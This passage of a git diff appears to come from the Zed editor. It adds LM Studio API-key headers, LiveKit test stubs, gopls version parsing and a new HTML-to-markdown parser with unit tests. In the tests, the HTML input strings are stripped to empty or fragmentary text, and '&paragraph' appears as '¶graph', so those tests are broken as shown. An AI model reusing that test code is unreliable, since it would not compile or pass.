publish_screenshare_track_wayland( + &self, + _cx: &mut AsyncApp, + ) -> Result<( + LocalTrackPublication, + Box, + futures::channel::oneshot::Receiver<()>, + )> { + let (_failure_tx, failure_rx) = futures::channel::oneshot::channel(); + let this = self.clone(); + let server = this.room.test_server(); + let sid = server + .publish_video_track(this.room.token(), LocalVideoTrack {}) + .await?; + Ok(( + LocalTrackPublication { + room: self.room.downgrade(), + sid, + }, + Box::new(TestWaylandScreenCaptureStream::new()), + failure_rx, + )) + } } impl RemoteParticipant { + pub fn connection_quality(&self) -> ConnectionQuality { + ConnectionQuality::Excellent + } + + pub fn audio_level(&self) -> f32 { + 0.0 + } + pub fn track_publications(&self) -> HashMap { if let Some(room) = self.room.upgrade() { let server = room.test_server(); @@ -134,3 +191,32 @@ impl ScreenCaptureStream for TestScreenCaptureStream { }) } } + +#[cfg(target_os = "linux")] +static NEXT_TEST_WAYLAND_SHARE_ID: AtomicU64 = AtomicU64::new(1); + +#[cfg(target_os = "linux")] +struct TestWaylandScreenCaptureStream { + id: u64, +} + +#[cfg(target_os = "linux")] +impl TestWaylandScreenCaptureStream { + fn new() -> Self { + Self { + id: NEXT_TEST_WAYLAND_SHARE_ID.fetch_add(1, std::sync::atomic::Ordering::Relaxed), + } + } +} + +#[cfg(target_os = "linux")] +impl ScreenCaptureStream for TestWaylandScreenCaptureStream { + fn metadata(&self) -> Result { + Ok(SourceMetadata { + id: self.id, + is_main: None, + label: None, + resolution: size(DevicePixels(1), DevicePixels(1)), + }) + } +} diff --git a/crates/livekit_client/src/record.rs b/crates/livekit_client/src/record.rs index c23ab2b938178e9b634f8e0d4d298f2c86450b51..c0fe9eb7218ad8550f7b63042d0e11c2cb53ee20 100644 --- a/crates/livekit_client/src/record.rs +++ b/crates/livekit_client/src/record.rs @@ -7,20 +7,22 @@ use std::{ }; use anyhow::{Context, Result}; +use cpal::DeviceId; use cpal::traits::{DeviceTrait, StreamTrait}; use rodio::{buffer::SamplesBuffer, 
conversions::SampleTypeConverter}; use util::ResultExt; pub struct CaptureInput { pub name: String, + pub input_device: Option, config: cpal::SupportedStreamConfig, samples: Arc>>, _stream: cpal::Stream, } impl CaptureInput { - pub fn start() -> anyhow::Result { - let (device, config) = crate::default_device(true)?; + pub fn start(input_device: Option) -> anyhow::Result { + let (device, config) = crate::default_device(true, input_device.as_ref())?; let name = device .description() .map(|desc| desc.name().to_string()) @@ -32,6 +34,7 @@ impl CaptureInput { Ok(Self { name, + input_device, _stream: stream, config, samples, diff --git a/crates/livekit_client/src/test.rs b/crates/livekit_client/src/test.rs index a8222b9a18b719f59ccaebdff6e08b7ee4edef67..4b5efe0aafbe5c27be0de973bc05e9901dd032ae 100644 --- a/crates/livekit_client/src/test.rs +++ b/crates/livekit_client/src/test.rs @@ -10,7 +10,7 @@ use parking_lot::Mutex; use postage::{mpsc, sink::Sink}; use std::sync::{ Arc, Weak, - atomic::{AtomicBool, Ordering::SeqCst}, + atomic::{AtomicBool, AtomicU64, Ordering::SeqCst}, }; #[derive(Clone, Debug, Eq, Hash, PartialEq, PartialOrd, Ord)] @@ -40,6 +40,15 @@ pub enum ConnectionState { Disconnected, } +#[derive(Clone, Debug, Default)] +pub struct SessionStats { + pub publisher_stats: Vec, + pub subscriber_stats: Vec, +} + +#[derive(Clone, Debug)] +pub enum RtcStats {} + static SERVERS: Mutex>> = Mutex::new(BTreeMap::new()); pub struct TestServer { @@ -739,9 +748,17 @@ impl Room { _track_name: String, _is_staff: bool, cx: &mut AsyncApp, - ) -> Result<(LocalTrackPublication, AudioStream)> { + ) -> Result<(LocalTrackPublication, AudioStream, Arc)> { self.local_participant().publish_microphone_track(cx).await } + + pub async fn get_stats(&self) -> Result { + Ok(SessionStats::default()) + } + + pub fn stats_task(&self, _cx: &impl gpui::AppContext) -> gpui::Task> { + gpui::Task::ready(Ok(SessionStats::default())) + } } impl Drop for RoomState { diff --git 
a/crates/lmstudio/src/lmstudio.rs b/crates/lmstudio/src/lmstudio.rs index ef2f7b6208f62e079609049b8eff83a80034741e..8a44b7fdefe5262d955606b0413b2b2425014296 100644 --- a/crates/lmstudio/src/lmstudio.rs +++ b/crates/lmstudio/src/lmstudio.rs @@ -354,14 +354,19 @@ pub struct ResponseMessageDelta { pub async fn complete( client: &dyn HttpClient, api_url: &str, + api_key: Option<&str>, request: ChatCompletionRequest, ) -> Result { let uri = format!("{api_url}/chat/completions"); - let request_builder = HttpRequest::builder() + let mut request_builder = HttpRequest::builder() .method(Method::POST) .uri(uri) .header("Content-Type", "application/json"); + if let Some(api_key) = api_key { + request_builder = request_builder.header("Authorization", format!("Bearer {}", api_key)); + } + let serialized_request = serde_json::to_string(&request)?; let request = request_builder.body(AsyncBody::from(serialized_request))?; @@ -386,14 +391,19 @@ pub async fn complete( pub async fn stream_chat_completion( client: &dyn HttpClient, api_url: &str, + api_key: Option<&str>, request: ChatCompletionRequest, ) -> Result>> { let uri = format!("{api_url}/chat/completions"); - let request_builder = http::Request::builder() + let mut request_builder = http::Request::builder() .method(Method::POST) .uri(uri) .header("Content-Type", "application/json"); + if let Some(api_key) = api_key { + request_builder = request_builder.header("Authorization", format!("Bearer {}", api_key)); + } + let request = request_builder.body(AsyncBody::from(serde_json::to_string(&request)?))?; let mut response = client.send(request).await?; if response.status().is_success() { @@ -434,14 +444,19 @@ pub async fn stream_chat_completion( pub async fn get_models( client: &dyn HttpClient, api_url: &str, + api_key: Option<&str>, _: Option, ) -> Result> { let uri = format!("{api_url}/models"); - let request_builder = HttpRequest::builder() + let mut request_builder = HttpRequest::builder() .method(Method::GET) .uri(uri) 
.header("Accept", "application/json"); + if let Some(api_key) = api_key { + request_builder = request_builder.header("Authorization", format!("Bearer {}", api_key)); + } + let request = request_builder.body(AsyncBody::default())?; let mut response = client.send(request).await?; diff --git a/crates/lsp/Cargo.toml b/crates/lsp/Cargo.toml index 9533ddb600b18213de4d6e50599c62aa182b9b8a..2c48575a648a9eba12b16ce8edb2cf959d7cc8b3 100644 --- a/crates/lsp/Cargo.toml +++ b/crates/lsp/Cargo.toml @@ -13,12 +13,13 @@ path = "src/lsp.rs" doctest = false [features] -test-support = ["async-pipe"] +test-support = ["async-pipe", "gpui_util"] [dependencies] anyhow.workspace = true async-pipe = { workspace = true, optional = true } collections.workspace = true +gpui_util = { workspace = true, optional = true } futures.workspace = true gpui.workspace = true log.workspace = true @@ -34,6 +35,7 @@ release_channel.workspace = true [dev-dependencies] async-pipe.workspace = true +gpui_util.workspace = true ctor.workspace = true gpui = { workspace = true, features = ["test-support"] } semver.workspace = true diff --git a/crates/lsp/src/lsp.rs b/crates/lsp/src/lsp.rs index e552c21d701cefa8aa1f4b6e14e826892e3b25b6..00fe0f59f1c71cd0c36e7f579b058191eff8f898 100644 --- a/crates/lsp/src/lsp.rs +++ b/crates/lsp/src/lsp.rs @@ -1306,6 +1306,29 @@ impl LanguageServer { self.version.clone() } + /// Get the readable version of the running language server. + pub fn readable_version(&self) -> Option { + match self.name().as_ref() { + "gopls" => { + // Gopls returns a detailed JSON object as its version string; we must parse it to extract the semantic version. 
+ // Example: `{"GoVersion":"go1.26.0","Path":"golang.org/x/tools/gopls","Main":{},"Deps":[],"Settings":[],"Version":"v0.21.1"}` + self.version + .as_ref() + .and_then(|obj| { + #[derive(Deserialize)] + struct GoplsVersion<'a> { + #[serde(rename = "Version")] + version: &'a str, + } + let parsed: GoplsVersion = serde_json::from_str(obj.as_str()).ok()?; + Some(parsed.version.trim_start_matches("v").to_owned().into()) + }) + .or_else(|| self.version.clone()) + } + _ => self.version.clone(), + } + } + /// Get the process name of the running language server. pub fn process_name(&self) -> &str { &self.process_name @@ -1970,10 +1993,14 @@ impl FakeLanguageServer { let responded_tx = responded_tx.clone(); let executor = cx.background_executor().clone(); async move { + let _guard = gpui_util::defer({ + let responded_tx = responded_tx.clone(); + move || { + responded_tx.unbounded_send(()).ok(); + } + }); executor.simulate_random_delay().await; - let result = result.await; - responded_tx.unbounded_send(()).ok(); - result + result.await } }) .detach(); diff --git a/crates/markdown/Cargo.toml b/crates/markdown/Cargo.toml index c923d3f704488a5364707486d25181188f74f166..be12bf2fe7f42e14c1723a8560a7f3c46ca83182 100644 --- a/crates/markdown/Cargo.toml +++ b/crates/markdown/Cargo.toml @@ -19,17 +19,23 @@ test-support = [ ] [dependencies] +anyhow.workspace = true base64.workspace = true collections.workspace = true futures.workspace = true gpui.workspace = true +html5ever.workspace = true language.workspace = true linkify.workspace = true log.workspace = true +markup5ever_rcdom.workspace = true +mermaid-rs-renderer.workspace = true pulldown-cmark.workspace = true settings.workspace = true +stacksafe.workspace = true sum_tree.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true diff --git a/crates/markdown/examples/markdown.rs b/crates/markdown/examples/markdown.rs index 
aa132443ee69201f0f1eba7b69c9627aee8f27e7..26c45377c725ec4d6701e4cf177615e3de4aba7e 100644 --- a/crates/markdown/examples/markdown.rs +++ b/crates/markdown/examples/markdown.rs @@ -41,7 +41,7 @@ pub fn main() { cx.bind_keys([KeyBinding::new("cmd-c", markdown::Copy, None)]); let node_runtime = NodeRuntime::unavailable(); - theme::init(LoadThemes::JustBase, cx); + theme_settings::init(LoadThemes::JustBase, cx); let fs = fs::FakeFs::new(cx.background_executor().clone()); let language_registry = LanguageRegistry::new(cx.background_executor().clone()); diff --git a/crates/markdown/examples/markdown_as_child.rs b/crates/markdown/examples/markdown_as_child.rs index b25b075dd3cb04ed949e1e30ed724c3b5f3088d1..38a4d2795f4ff97297c3d549f8de687827ff75ef 100644 --- a/crates/markdown/examples/markdown_as_child.rs +++ b/crates/markdown/examples/markdown_as_child.rs @@ -28,7 +28,7 @@ pub fn main() { let language_registry = Arc::new(LanguageRegistry::new(cx.background_executor().clone())); let fs = fs::FakeFs::new(cx.background_executor().clone()); languages::init(language_registry, fs, node_runtime, cx); - theme::init(LoadThemes::JustBase, cx); + theme_settings::init(LoadThemes::JustBase, cx); Assets.load_fonts(cx).unwrap(); cx.activate(true); diff --git a/crates/markdown/src/html.rs b/crates/markdown/src/html.rs new file mode 100644 index 0000000000000000000000000000000000000000..cf37f6138cd49733b5ca6f093ced9a00481f4edb --- /dev/null +++ b/crates/markdown/src/html.rs @@ -0,0 +1,3 @@ +mod html_minifier; +pub(crate) mod html_parser; +mod html_rendering; diff --git a/crates/markdown_preview/src/markdown_minifier.rs b/crates/markdown/src/html/html_minifier.rs similarity index 100% rename from crates/markdown_preview/src/markdown_minifier.rs rename to crates/markdown/src/html/html_minifier.rs diff --git a/crates/markdown/src/html/html_parser.rs b/crates/markdown/src/html/html_parser.rs new file mode 100644 index 
0000000000000000000000000000000000000000..20338ec2abef2314b7cd6ca91e45ee05be909745 --- /dev/null +++ b/crates/markdown/src/html/html_parser.rs @@ -0,0 +1,883 @@ +use std::{cell::RefCell, collections::HashMap, mem, ops::Range}; + +use gpui::{DefiniteLength, FontWeight, SharedString, px, relative}; +use html5ever::{ + Attribute, LocalName, ParseOpts, local_name, parse_document, tendril::TendrilSink, +}; +use markup5ever_rcdom::{Node, NodeData, RcDom}; +use pulldown_cmark::{Alignment, HeadingLevel}; +use stacksafe::stacksafe; + +use crate::html::html_minifier::{Minifier, MinifierOptions}; + +#[derive(Debug, Clone, Default)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlBlock { + pub source_range: Range, + pub children: Vec, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) enum ParsedHtmlElement { + Heading(ParsedHtmlHeading), + List(ParsedHtmlList), + Table(ParsedHtmlTable), + BlockQuote(ParsedHtmlBlockQuote), + Paragraph(HtmlParagraph), + Image(HtmlImage), +} + +impl ParsedHtmlElement { + pub fn source_range(&self) -> Option> { + Some(match self { + Self::Heading(heading) => heading.source_range.clone(), + Self::List(list) => list.source_range.clone(), + Self::Table(table) => table.source_range.clone(), + Self::BlockQuote(block_quote) => block_quote.source_range.clone(), + Self::Paragraph(text) => match text.first()? 
{ + HtmlParagraphChunk::Text(text) => text.source_range.clone(), + HtmlParagraphChunk::Image(image) => image.source_range.clone(), + }, + Self::Image(image) => image.source_range.clone(), + }) + } +} + +pub(crate) type HtmlParagraph = Vec; + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) enum HtmlParagraphChunk { + Text(ParsedHtmlText), + Image(HtmlImage), +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlList { + pub source_range: Range, + pub depth: u16, + pub ordered: bool, + pub items: Vec, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlListItem { + pub source_range: Range, + pub item_type: ParsedHtmlListItemType, + pub content: Vec, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) enum ParsedHtmlListItemType { + Ordered(u64), + Unordered, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlHeading { + pub source_range: Range, + pub level: HeadingLevel, + pub contents: HtmlParagraph, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlTable { + pub source_range: Range, + pub header: Vec, + pub body: Vec, + pub caption: Option, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlTableColumn { + pub col_span: usize, + pub row_span: usize, + pub is_header: bool, + pub children: HtmlParagraph, + pub alignment: Alignment, +} + +#[derive(Debug, Clone, Default)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlTableRow { + pub columns: Vec, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlBlockQuote { + pub source_range: Range, + pub children: Vec, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlText { + pub source_range: Range, + pub contents: SharedString, + pub 
highlights: Vec<(Range, HtmlHighlightStyle)>, + pub links: Vec<(Range, SharedString)>, +} + +#[derive(Debug, Clone, Default, PartialEq, Eq)] +pub(crate) struct HtmlHighlightStyle { + pub italic: bool, + pub underline: bool, + pub strikethrough: bool, + pub weight: FontWeight, + pub link: bool, + pub oblique: bool, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct HtmlImage { + pub dest_url: SharedString, + pub source_range: Range, + pub alt_text: Option, + pub width: Option, + pub height: Option, +} + +impl HtmlImage { + fn new(dest_url: String, source_range: Range) -> Self { + Self { + dest_url: dest_url.into(), + source_range, + alt_text: None, + width: None, + height: None, + } + } + + fn set_alt_text(&mut self, alt_text: SharedString) { + self.alt_text = Some(alt_text); + } + + fn set_width(&mut self, width: DefiniteLength) { + self.width = Some(width); + } + + fn set_height(&mut self, height: DefiniteLength) { + self.height = Some(height); + } +} + +#[derive(Debug)] +struct ParseHtmlNodeContext { + list_item_depth: u16, +} + +impl Default for ParseHtmlNodeContext { + fn default() -> Self { + Self { list_item_depth: 1 } + } +} + +pub(crate) fn parse_html_block( + source: &str, + source_range: Range, +) -> Option { + let bytes = cleanup_html(source); + let mut cursor = std::io::Cursor::new(bytes); + let dom = parse_document(RcDom::default(), ParseOpts::default()) + .from_utf8() + .read_from(&mut cursor) + .ok()?; + + let mut children = Vec::new(); + parse_html_node( + source_range.clone(), + &dom.document, + &mut children, + &ParseHtmlNodeContext::default(), + ); + + Some(ParsedHtmlBlock { + source_range, + children, + }) +} + +fn cleanup_html(source: &str) -> Vec { + let mut writer = std::io::Cursor::new(Vec::new()); + let mut reader = std::io::Cursor::new(source); + let mut minify = Minifier::new( + &mut writer, + MinifierOptions { + omit_doctype: true, + collapse_whitespace: true, + ..Default::default() + }, + ); + if let 
Ok(()) = minify.minify(&mut reader) { + writer.into_inner() + } else { + source.bytes().collect() + } +} + +#[stacksafe] +fn parse_html_node( + source_range: Range, + node: &Node, + elements: &mut Vec, + context: &ParseHtmlNodeContext, +) { + match &node.data { + NodeData::Document => { + consume_children(source_range, node, elements, context); + } + NodeData::Text { contents } => { + elements.push(ParsedHtmlElement::Paragraph(vec![ + HtmlParagraphChunk::Text(ParsedHtmlText { + source_range, + highlights: Vec::default(), + links: Vec::default(), + contents: contents.borrow().to_string().into(), + }), + ])); + } + NodeData::Comment { .. } => {} + NodeData::Element { name, attrs, .. } => { + let mut styles = if let Some(styles) = + html_style_from_html_styles(extract_styles_from_attributes(attrs)) + { + vec![styles] + } else { + Vec::default() + }; + + if name.local == local_name!("img") { + if let Some(image) = extract_image(source_range, attrs) { + elements.push(ParsedHtmlElement::Image(image)); + } + } else if name.local == local_name!("p") { + let mut paragraph = HtmlParagraph::new(); + parse_paragraph( + source_range, + node, + &mut paragraph, + &mut styles, + &mut Vec::new(), + ); + + if !paragraph.is_empty() { + elements.push(ParsedHtmlElement::Paragraph(paragraph)); + } + } else if matches!( + name.local, + local_name!("h1") + | local_name!("h2") + | local_name!("h3") + | local_name!("h4") + | local_name!("h5") + | local_name!("h6") + ) { + let mut paragraph = HtmlParagraph::new(); + consume_paragraph( + source_range.clone(), + node, + &mut paragraph, + &mut styles, + &mut Vec::new(), + ); + + if !paragraph.is_empty() { + elements.push(ParsedHtmlElement::Heading(ParsedHtmlHeading { + source_range, + level: match name.local { + local_name!("h1") => HeadingLevel::H1, + local_name!("h2") => HeadingLevel::H2, + local_name!("h3") => HeadingLevel::H3, + local_name!("h4") => HeadingLevel::H4, + local_name!("h5") => HeadingLevel::H5, + local_name!("h6") => 
HeadingLevel::H6, + _ => unreachable!(), + }, + contents: paragraph, + })); + } + } else if name.local == local_name!("ul") || name.local == local_name!("ol") { + if let Some(list) = extract_html_list( + node, + name.local == local_name!("ol"), + context.list_item_depth, + source_range, + ) { + elements.push(ParsedHtmlElement::List(list)); + } + } else if name.local == local_name!("blockquote") { + if let Some(blockquote) = extract_html_blockquote(node, source_range) { + elements.push(ParsedHtmlElement::BlockQuote(blockquote)); + } + } else if name.local == local_name!("table") { + if let Some(table) = extract_html_table(node, source_range) { + elements.push(ParsedHtmlElement::Table(table)); + } + } else { + consume_children(source_range, node, elements, context); + } + } + _ => {} + } +} + +#[stacksafe] +fn parse_paragraph( + source_range: Range, + node: &Node, + paragraph: &mut HtmlParagraph, + highlights: &mut Vec, + links: &mut Vec, +) { + fn items_with_range( + range: Range, + items: impl IntoIterator, + ) -> Vec<(Range, T)> { + items + .into_iter() + .map(|item| (range.clone(), item)) + .collect() + } + + match &node.data { + NodeData::Text { contents } => { + if let Some(text) = + paragraph + .iter_mut() + .last() + .and_then(|paragraph_chunk| match paragraph_chunk { + HtmlParagraphChunk::Text(text) => Some(text), + _ => None, + }) + { + let mut new_text = text.contents.to_string(); + new_text.push_str(&contents.borrow()); + + text.highlights.extend(items_with_range( + text.contents.len()..new_text.len(), + mem::take(highlights), + )); + text.links.extend(items_with_range( + text.contents.len()..new_text.len(), + mem::take(links), + )); + text.contents = SharedString::from(new_text); + } else { + let contents = contents.borrow().to_string(); + paragraph.push(HtmlParagraphChunk::Text(ParsedHtmlText { + source_range, + highlights: items_with_range(0..contents.len(), mem::take(highlights)), + links: items_with_range(0..contents.len(), mem::take(links)), + 
contents: contents.into(), + })); + } + } + NodeData::Element { name, attrs, .. } => { + if name.local == local_name!("img") { + if let Some(image) = extract_image(source_range, attrs) { + paragraph.push(HtmlParagraphChunk::Image(image)); + } + } else if name.local == local_name!("b") || name.local == local_name!("strong") { + highlights.push(HtmlHighlightStyle { + weight: FontWeight::BOLD, + ..Default::default() + }); + consume_paragraph(source_range, node, paragraph, highlights, links); + } else if name.local == local_name!("i") { + highlights.push(HtmlHighlightStyle { + italic: true, + ..Default::default() + }); + consume_paragraph(source_range, node, paragraph, highlights, links); + } else if name.local == local_name!("em") { + highlights.push(HtmlHighlightStyle { + oblique: true, + ..Default::default() + }); + consume_paragraph(source_range, node, paragraph, highlights, links); + } else if name.local == local_name!("del") { + highlights.push(HtmlHighlightStyle { + strikethrough: true, + ..Default::default() + }); + consume_paragraph(source_range, node, paragraph, highlights, links); + } else if name.local == local_name!("ins") { + highlights.push(HtmlHighlightStyle { + underline: true, + ..Default::default() + }); + consume_paragraph(source_range, node, paragraph, highlights, links); + } else if name.local == local_name!("a") { + if let Some(url) = attr_value(attrs, local_name!("href")) { + highlights.push(HtmlHighlightStyle { + link: true, + ..Default::default() + }); + links.push(url.into()); + } + consume_paragraph(source_range, node, paragraph, highlights, links); + } else { + consume_paragraph(source_range, node, paragraph, highlights, links); + } + } + _ => {} + } +} + +fn consume_paragraph( + source_range: Range, + node: &Node, + paragraph: &mut HtmlParagraph, + highlights: &mut Vec, + links: &mut Vec, +) { + for child in node.children.borrow().iter() { + parse_paragraph(source_range.clone(), child, paragraph, highlights, links); + } +} + +fn 
parse_table_row(source_range: Range, node: &Node) -> Option { + let mut columns = Vec::new(); + + if let NodeData::Element { name, .. } = &node.data { + if name.local != local_name!("tr") { + return None; + } + + for child in node.children.borrow().iter() { + if let Some(column) = parse_table_column(source_range.clone(), child) { + columns.push(column); + } + } + } + + if columns.is_empty() { + None + } else { + Some(ParsedHtmlTableRow { columns }) + } +} + +fn parse_table_column(source_range: Range, node: &Node) -> Option { + match &node.data { + NodeData::Element { name, attrs, .. } => { + if !matches!(name.local, local_name!("th") | local_name!("td")) { + return None; + } + + let mut children = HtmlParagraph::new(); + consume_paragraph( + source_range, + node, + &mut children, + &mut Vec::new(), + &mut Vec::new(), + ); + + let is_header = name.local == local_name!("th"); + + Some(ParsedHtmlTableColumn { + col_span: std::cmp::max( + attr_value(attrs, local_name!("colspan")) + .and_then(|span| span.parse().ok()) + .unwrap_or(1), + 1, + ), + row_span: std::cmp::max( + attr_value(attrs, local_name!("rowspan")) + .and_then(|span| span.parse().ok()) + .unwrap_or(1), + 1, + ), + is_header, + children, + alignment: attr_value(attrs, local_name!("align")) + .and_then(|align| match align.as_str() { + "left" => Some(Alignment::Left), + "center" => Some(Alignment::Center), + "right" => Some(Alignment::Right), + _ => None, + }) + .unwrap_or(if is_header { + Alignment::Center + } else { + Alignment::None + }), + }) + } + _ => None, + } +} + +fn consume_children( + source_range: Range, + node: &Node, + elements: &mut Vec, + context: &ParseHtmlNodeContext, +) { + for child in node.children.borrow().iter() { + parse_html_node(source_range.clone(), child, elements, context); + } +} + +fn attr_value(attrs: &RefCell>, name: LocalName) -> Option { + attrs.borrow().iter().find_map(|attr| { + if attr.name.local == name { + Some(attr.value.to_string()) + } else { + None + } + }) +} + 
+fn html_style_from_html_styles(styles: HashMap) -> Option { + let mut html_style = HtmlHighlightStyle::default(); + + if let Some(text_decoration) = styles.get("text-decoration") { + match text_decoration.to_lowercase().as_str() { + "underline" => { + html_style.underline = true; + } + "line-through" => { + html_style.strikethrough = true; + } + _ => {} + } + } + + if let Some(font_style) = styles.get("font-style") { + match font_style.to_lowercase().as_str() { + "italic" => { + html_style.italic = true; + } + "oblique" => { + html_style.oblique = true; + } + _ => {} + } + } + + if let Some(font_weight) = styles.get("font-weight") { + match font_weight.to_lowercase().as_str() { + "bold" => { + html_style.weight = FontWeight::BOLD; + } + "lighter" => { + html_style.weight = FontWeight::THIN; + } + _ => { + if let Ok(weight) = font_weight.parse::() { + html_style.weight = FontWeight(weight); + } + } + } + } + + if html_style != HtmlHighlightStyle::default() { + Some(html_style) + } else { + None + } +} + +fn extract_styles_from_attributes(attrs: &RefCell>) -> HashMap { + let mut styles = HashMap::new(); + + if let Some(style) = attr_value(attrs, local_name!("style")) { + for declaration in style.split(';') { + let mut parts = declaration.splitn(2, ':'); + if let Some((key, value)) = parts.next().zip(parts.next()) { + styles.insert(key.trim().to_lowercase(), value.trim().to_string()); + } + } + } + + styles +} + +fn extract_image(source_range: Range, attrs: &RefCell>) -> Option { + let src = attr_value(attrs, local_name!("src"))?; + + let mut image = HtmlImage::new(src, source_range); + + if let Some(alt) = attr_value(attrs, local_name!("alt")) { + image.set_alt_text(alt.into()); + } + + let styles = extract_styles_from_attributes(attrs); + + if let Some(width) = attr_value(attrs, local_name!("width")) + .or_else(|| styles.get("width").cloned()) + .and_then(|width| parse_html_element_dimension(&width)) + { + image.set_width(width); + } + + if let Some(height) = 
attr_value(attrs, local_name!("height")) + .or_else(|| styles.get("height").cloned()) + .and_then(|height| parse_html_element_dimension(&height)) + { + image.set_height(height); + } + + Some(image) +} + +fn extract_html_list( + node: &Node, + ordered: bool, + depth: u16, + source_range: Range, +) -> Option { + let mut items = Vec::with_capacity(node.children.borrow().len()); + + for (index, child) in node.children.borrow().iter().enumerate() { + if let NodeData::Element { name, .. } = &child.data { + if name.local != local_name!("li") { + continue; + } + + let mut content = Vec::new(); + consume_children( + source_range.clone(), + child, + &mut content, + &ParseHtmlNodeContext { + list_item_depth: depth + 1, + }, + ); + + if !content.is_empty() { + items.push(ParsedHtmlListItem { + source_range: source_range.clone(), + item_type: if ordered { + ParsedHtmlListItemType::Ordered(index as u64 + 1) + } else { + ParsedHtmlListItemType::Unordered + }, + content, + }); + } + } + } + + if items.is_empty() { + None + } else { + Some(ParsedHtmlList { + source_range, + depth, + ordered, + items, + }) + } +} + +fn parse_html_element_dimension(value: &str) -> Option { + if value.ends_with('%') { + value + .trim_end_matches('%') + .parse::() + .ok() + .map(|value| relative(value / 100.)) + } else { + value + .trim_end_matches("px") + .parse() + .ok() + .map(|value| px(value).into()) + } +} + +fn extract_html_blockquote( + node: &Node, + source_range: Range, +) -> Option { + let mut children = Vec::new(); + consume_children( + source_range.clone(), + node, + &mut children, + &ParseHtmlNodeContext::default(), + ); + + if children.is_empty() { + None + } else { + Some(ParsedHtmlBlockQuote { + children, + source_range, + }) + } +} + +fn extract_html_table(node: &Node, source_range: Range) -> Option { + let mut header_rows = Vec::new(); + let mut body_rows = Vec::new(); + let mut caption = None; + + for child in node.children.borrow().iter() { + if let NodeData::Element { name, .. 
} = &child.data { + if name.local == local_name!("caption") { + let mut paragraph = HtmlParagraph::new(); + parse_paragraph( + source_range.clone(), + child, + &mut paragraph, + &mut Vec::new(), + &mut Vec::new(), + ); + caption = Some(paragraph); + } + + if name.local == local_name!("thead") { + for row in child.children.borrow().iter() { + if let Some(row) = parse_table_row(source_range.clone(), row) { + header_rows.push(row); + } + } + } else if name.local == local_name!("tbody") { + for row in child.children.borrow().iter() { + if let Some(row) = parse_table_row(source_range.clone(), row) { + body_rows.push(row); + } + } + } + } + } + + if !header_rows.is_empty() || !body_rows.is_empty() { + Some(ParsedHtmlTable { + source_range, + body: body_rows, + header: header_rows, + caption, + }) + } else { + None + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn parses_html_styled_text() { + let parsed = parse_html_block( + "", + 0..79, + ) + .unwrap(); + + assert_eq!(parsed.children.len(), 1); + let ParsedHtmlElement::Paragraph(paragraph) = &parsed.children[0] else { + panic!("expected paragraph"); + }; + let HtmlParagraphChunk::Text(text) = ¶graph[0] else { + panic!("expected text chunk"); + }; + + assert_eq!(text.contents.as_ref(), "Some text strong link"); + assert_eq!( + text.highlights, + vec![ + ( + 10..16, + HtmlHighlightStyle { + weight: FontWeight::BOLD, + ..Default::default() + } + ), + ( + 17..21, + HtmlHighlightStyle { + link: true, + ..Default::default() + } + ) + ] + ); + assert_eq!( + text.links, + vec![(17..21, SharedString::from("https://example.com"))] + ); + } + + #[test] + fn parses_html_table_spans() { + let parsed = parse_html_block( + "
a
bc
", + 0..91, + ) + .unwrap(); + + let ParsedHtmlElement::Table(table) = &parsed.children[0] else { + panic!("expected table"); + }; + assert_eq!(table.body.len(), 2); + assert_eq!(table.body[0].columns[0].col_span, 2); + assert_eq!(table.body[1].columns.len(), 2); + } + + #[test] + fn parses_html_list_as_explicit_list_node() { + let parsed = parse_html_block( + "
  • parent
    • child
  • sibling
", + 0..64, + ) + .unwrap(); + + assert_eq!(parsed.children.len(), 1); + + let ParsedHtmlElement::List(list) = &parsed.children[0] else { + panic!("expected list"); + }; + + assert!(!list.ordered); + assert_eq!(list.depth, 1); + assert_eq!(list.items.len(), 2); + + let first_item = &list.items[0]; + let ParsedHtmlElement::Paragraph(paragraph) = &first_item.content[0] else { + panic!("expected first item paragraph"); + }; + let HtmlParagraphChunk::Text(text) = ¶graph[0] else { + panic!("expected first item text"); + }; + assert_eq!(text.contents.as_ref(), "parent"); + + let ParsedHtmlElement::List(nested_list) = &first_item.content[1] else { + panic!("expected nested list"); + }; + assert_eq!(nested_list.depth, 2); + assert_eq!(nested_list.items.len(), 1); + + let ParsedHtmlElement::Paragraph(nested_paragraph) = &nested_list.items[0].content[0] + else { + panic!("expected nested item paragraph"); + }; + let HtmlParagraphChunk::Text(nested_text) = &nested_paragraph[0] else { + panic!("expected nested item text"); + }; + assert_eq!(nested_text.contents.as_ref(), "child"); + + let second_item = &list.items[1]; + let ParsedHtmlElement::Paragraph(second_paragraph) = &second_item.content[0] else { + panic!("expected second item paragraph"); + }; + let HtmlParagraphChunk::Text(second_text) = &second_paragraph[0] else { + panic!("expected second item text"); + }; + assert_eq!(second_text.contents.as_ref(), "sibling"); + } +} diff --git a/crates/markdown/src/html/html_rendering.rs b/crates/markdown/src/html/html_rendering.rs new file mode 100644 index 0000000000000000000000000000000000000000..103e2a6accb7dce9bc429419aafd27cbdf5080ce --- /dev/null +++ b/crates/markdown/src/html/html_rendering.rs @@ -0,0 +1,614 @@ +use std::ops::Range; + +use gpui::{App, FontStyle, FontWeight, StrikethroughStyle, TextStyleRefinement, UnderlineStyle}; +use pulldown_cmark::Alignment; +use ui::prelude::*; + +use crate::html::html_parser::{ + HtmlHighlightStyle, HtmlImage, 